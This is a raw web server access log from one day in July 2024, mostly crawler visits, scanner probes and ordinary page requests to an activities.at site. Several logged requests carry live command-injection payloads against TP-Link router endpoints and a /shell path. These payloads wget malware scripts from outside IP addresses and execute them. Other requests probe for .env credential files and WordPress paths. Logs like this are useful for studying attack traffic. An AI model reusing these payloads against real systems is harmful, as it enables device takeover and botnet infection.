52.230.152.196 - - [23/Jul/2024:02:05:43 +0200] "GET /robots.txt HTTP/1.1" 404 298 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.0; +https://openai.com/gptbot)"
8.221.140.221 - - [23/Jul/2024:02:07:16 +0200] "GET / HTTP/1.1" 200 423 "-" "curl/7.64.1"
185.224.128.43 - - [23/Jul/2024:02:16:19 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
194.165.17.11 - - [23/Jul/2024:02:28:54 +0200] "\x03" 400 383 "-" "-"
156.59.198.136 - - [23/Jul/2024:02:49:19 +0200] "GET /ed-test.2web.at/stats/lang/awstats-ua.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jul/2024:02:49:52 +0200] "GET /ed-test.2web.at/stats/lang/awstats-lt.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.148.10.202 - - [23/Jul/2024:03:26:47 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [23/Jul/2024:03:32:09 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11379317.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.51.84 - - [23/Jul/2024:03:32:30 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
143.198.87.216 - - [23/Jul/2024:03:32:51 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.9628.1588 Mobile Safari/537.36"
156.59.198.135 - - [23/Jul/2024:03:34:37 +0200] "GET /renault.activities.at/htdocs/activities/framework/KoolControls/KoolImageView/styles/dark/dark.xml HTTP/1.0" 404 335 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.189 - - [23/Jul/2024:03:36:43 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.135 - - [23/Jul/2024:03:37:21 +0200] "GET /renault.2web.at/htdocs/binaries/10197031.doc HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jul/2024:03:38:32 +0200] "GET /renault.2web.at/htdocs/export/xml/data/exportArticles_20230924035604.xml HTTP/1.0" 404 326 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jul/2024:03:47:28 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11723628.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jul/2024:03:47:51 +0200] "GET /ed-test.2web.at/stats/lang/awstats-he.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jul/2024:03:48:34 +0200] "GET /ed-test.2web.at/stats/lang/awstats-fr.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jul/2024:03:57:32 +0200] "GET /renault.2web.at/htdocs/binaries/renault-/rs-74-2016winter-check-und-service-tageanmeldungdoc.doc HTTP/1.0" 404 338 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.148.10.202 - - [23/Jul/2024:04:00:54 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
45.148.10.202 - - [23/Jul/2024:04:00:54 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
194.38.23.16 - - [23/Jul/2024:04:09:45 +0200] "GET /assets/fileupload/index.php?file=tf2rghf.jpg HTTP/1.1" 404 379 "-" "ALittle Client"
194.38.23.16 - - [23/Jul/2024:04:09:56 +0200] "GET /assets/fileupload/index.php?file=tf2rghf.jpg HTTP/1.1" 404 392 "-" "ALittle Client"
46.101.6.185 - - [23/Jul/2024:04:12:57 +0200] "GET /modules/simpleimportproduct/views/js/error.js HTTP/1.1" 404 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
92.249.48.202 - - [23/Jul/2024:04:34:22 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [23/Jul/2024:04:51:13 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009280903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
52.230.152.166 - - [23/Jul/2024:04:53:43 +0200] "GET /robots.txt HTTP/1.1" 404 293 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.0; +https://openai.com/gptbot)"
156.59.198.136 - - [23/Jul/2024:04:55:54 +0200] "GET /renault.2web.at/htdocs/binaries/renault-/rs-129-fr.doc HTTP/1.0" 404 310 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
172.169.5.232 - - [23/Jul/2024:04:57:47 +0200] "GET /manager/text/list HTTP/1.1" 404 289 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.135 - - [23/Jul/2024:05:08:14 +0200] "GET /renault.activities.at/htdocs/activities/framework/webfx/javascript/flot/CONTRIBUTING.md HTTP/1.0" 404 335 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
183.249.1.150 - - [23/Jul/2024:05:11:29 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.6.255.132/jaws;sh+/tmp/jaws" 400 383 "-" "-"
52.230.152.216 - - [23/Jul/2024:05:17:25 +0200] "GET /robots.txt HTTP/1.1" 404 291 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.0; +https://openai.com/gptbot)"
103.67.163.101 - - [23/Jul/2024:05:18:53 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.67.163.101 - - [23/Jul/2024:05:18:54 +0200] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.15.184.67 - - [23/Jul/2024:05:36:30 +0200] "GET //wp-content/plugins/wp-catcher/index.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
156.59.198.136 - - [23/Jul/2024:05:39:33 +0200] "GET /renault.activities.at/htdocs/activities/framework/webfx/javascript/flot/PLUGINS.md HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jul/2024:05:59:05 +0200] "GET /ed.activities.at/etc/redirects/redirects.xls HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
51.190.239.41 - - [23/Jul/2024:06:00:57 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.135 - - [23/Jul/2024:06:39:50 +0200] "GET /ed-test.2web.at/stats/lang/awstats-de.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
176.113.115.200 - - [23/Jul/2024:06:41:17 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
64.62.197.96 - - [23/Jul/2024:07:06:03 +0200] "\x16\x03\x01" 400 383 "-" "-"
95.111.253.31 - - [23/Jul/2024:07:08:37 +0200] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
156.59.198.135 - - [23/Jul/2024:07:09:59 +0200] "GET /renault.2web.at/htdocs/binaries/10656106.doc HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.101.122.229 - - [23/Jul/2024:07:10:32 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
141.98.11.189 - - [23/Jul/2024:07:17:38 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
185.224.128.43 - - [23/Jul/2024:07:32:30 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [23/Jul/2024:07:37:47 +0200] "GET /renault.activities.at/htdocs/activities/framework/KoolControls/KoolImageView/styles/silver/silver.xml HTTP/1.0" 404 337 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.189 - - [23/Jul/2024:07:54:14 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
45.156.130.6 - - [23/Jul/2024:07:56:30 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
94.156.66.185 - - [23/Jul/2024:08:10:05 +0200] "GET /.well-known/ HTTP/1.1" 404 297 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.156.66.185 - - [23/Jul/2024:08:10:13 +0200] "GET /wp-content/uploads/ HTTP/1.1" 404 301 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.156.66.185 - - [23/Jul/2024:08:10:20 +0200] "GET /wp-includes/ HTTP/1.1" 404 297 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.156.66.185 - - [23/Jul/2024:08:10:26 +0200] "GET /wp-admin/ HTTP/1.1" 404 295 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.156.66.185 - - [23/Jul/2024:08:10:32 +0200] "GET /wp-content/ HTTP/1.1" 404 296 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.156.66.185 - - [23/Jul/2024:08:10:35 +0200] "GET /wp-content/upgrade/ HTTP/1.1" 404 301 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.156.66.185 - - [23/Jul/2024:08:10:36 +0200] "GET /.well-knownold/ HTTP/1.1" 404 299 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
84.54.51.37 - - [23/Jul/2024:08:13:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F74.50.81.158%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
188.166.169.244 - - [23/Jul/2024:09:40:10 +0200] "\x16\x03\x01\x01\xfc\x01" 400 383 "-" "-"
156.59.198.135 - - [23/Jul/2024:09:53:06 +0200] "GET /ed-test.2web.at/stats/lang/awstats-ca.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jul/2024:10:05:24 +0200] "GET /renault.activities.at/htdocs/activities/framework/KoolControls/KoolImageView/styles/outlook/outlook.xml HTTP/1.0" 404 339 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.213 - - [23/Jul/2024:10:08:20 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
91.92.244.183 - - [23/Jul/2024:10:16:26 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4"
35.203.211.210 - - [23/Jul/2024:10:25:48 +0200] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.189.182.234 - - [23/Jul/2024:10:36:00 +0200] "GET / HTTP/1.1" 400 383 "-" "-"
156.59.198.135 - - [23/Jul/2024:10:37:00 +0200] "GET /renault.2web.at/htdocs/export/xml/data/exportArticles_20230917225211.xml HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.213 - - [23/Jul/2024:10:59:53 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
80.82.77.202 - - [23/Jul/2024:11:02:33 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
141.98.11.189 - - [23/Jul/2024:11:09:33 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
163.123.194.10 - - [23/Jul/2024:11:38:18 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
163.123.194.10 - - [23/Jul/2024:11:38:19 +0200] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.230.152.220 - - [23/Jul/2024:11:41:25 +0200] "GET /robots.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.0; +https://openai.com/gptbot)"
156.59.198.136 - - [23/Jul/2024:11:45:26 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10607033.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
91.92.247.20 - - [23/Jul/2024:11:46:24 +0200] "GET /api/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
156.59.198.135 - - [23/Jul/2024:11:49:16 +0200] "GET /renault.activities.at/htdocs/activities/framework/webfx/javascript/flot/FAQ.md HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
94.156.68.162 - - [23/Jul/2024:11:49:31 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36"
94.156.68.162 - - [23/Jul/2024:11:50:42 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0"
185.191.126.213 - - [23/Jul/2024:11:54:35 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
178.165.188.60 - - [23/Jul/2024:12:06:57 +0200] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:06:58 +0200] "GET /entry.php?id=10273 HTTP/1.1" 200 1901 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:06:58 +0200] "GET /entry.php?id=10272 HTTP/1.1" 200 1158 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:06:58 +0200] "GET /entry.php?id=10270 HTTP/1.1" 200 909 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:06:58 +0200] "GET /entry.php?id=11412 HTTP/1.1" 200 1758 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:06:59 +0200] "GET /gui/styles/tmplDefault.css HTTP/1.1" 200 2135 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:06:59 +0200] "GET /gui/javascript/form_form.js?1721729218 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:06:59 +0200] "GET /gui/javascript/form_form.js?1721729218 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:06:59 +0200] "GET /gui/javascript/form_form.js?1721729218 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:06:59 +0200] "GET /gui/javascript/form_form.js?1721729218 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:06:59 +0200] "GET /entry.php?id=10287 HTTP/1.1" 200 2418 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:06:59 +0200] "GET /entry.php?id=10271& HTTP/1.1" 200 933 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:06:59 +0200] "GET /gui/javascript/form_form.js?1721729219 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:06:59 +0200] "GET /gui/javascript/form_form.js?1721729219 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:06:59 +0200] "GET /entry.php?id=10273& HTTP/1.1" 200 1901 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:06:59 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 908 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:07:01 +0200] "POST /entry.php?id=10287& HTTP/1.1" 200 1966 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:08:04 +0200] "GET /gui/javascript/form_form.js?1721729284 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:08:05 +0200] "GET /entry.php?id=10273& HTTP/1.1" 200 2012 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:08:05 +0200] "GET /gui/javascript/form_form.js?1721729285 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:08:05 +0200] "GET /entry.php?id=10271& HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:08:05 +0200] "GET /entry.php?id=10270&__app__=10006038 HTTP/1.1" 200 2230 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:08:05 +0200] "GET /undefined HTTP/1.1" 404 289 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:08:05 +0200] "GET /framework/webfx/style/toolbar/images/cbback.gif HTTP/1.1" 404 318 "http://hausegger.activities.at/framework/webfx/style/toolbar/cb2.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:09:05 +0200] "GET /entry.php?id=10271&&ser=729285 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:09:05 +0200] "GET /gui/javascript/form_form.js?1721729345 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=729285" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:10:05 +0200] "GET /entry.php?id=10271&&ser=729345 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=729285" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:10:05 +0200] "GET /gui/javascript/form_form.js?1721729405 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=729345" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.136 - - [23/Jul/2024:12:10:33 +0200] "GET /ed-test.activities.at/stats/lang/awstats-pl.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.188.60 - - [23/Jul/2024:12:11:06 +0200] "GET /entry.php?id=10271&&ser=729405 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=729345" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:11:06 +0200] "GET /gui/javascript/form_form.js?1721729466 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=729405" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:12:08 +0200] "GET /entry.php?id=10271&&ser=729466 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=729405" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [23/Jul/2024:12:12:08 +0200] "GET /gui/javascript/form_form.js?1721729528 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=729466" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
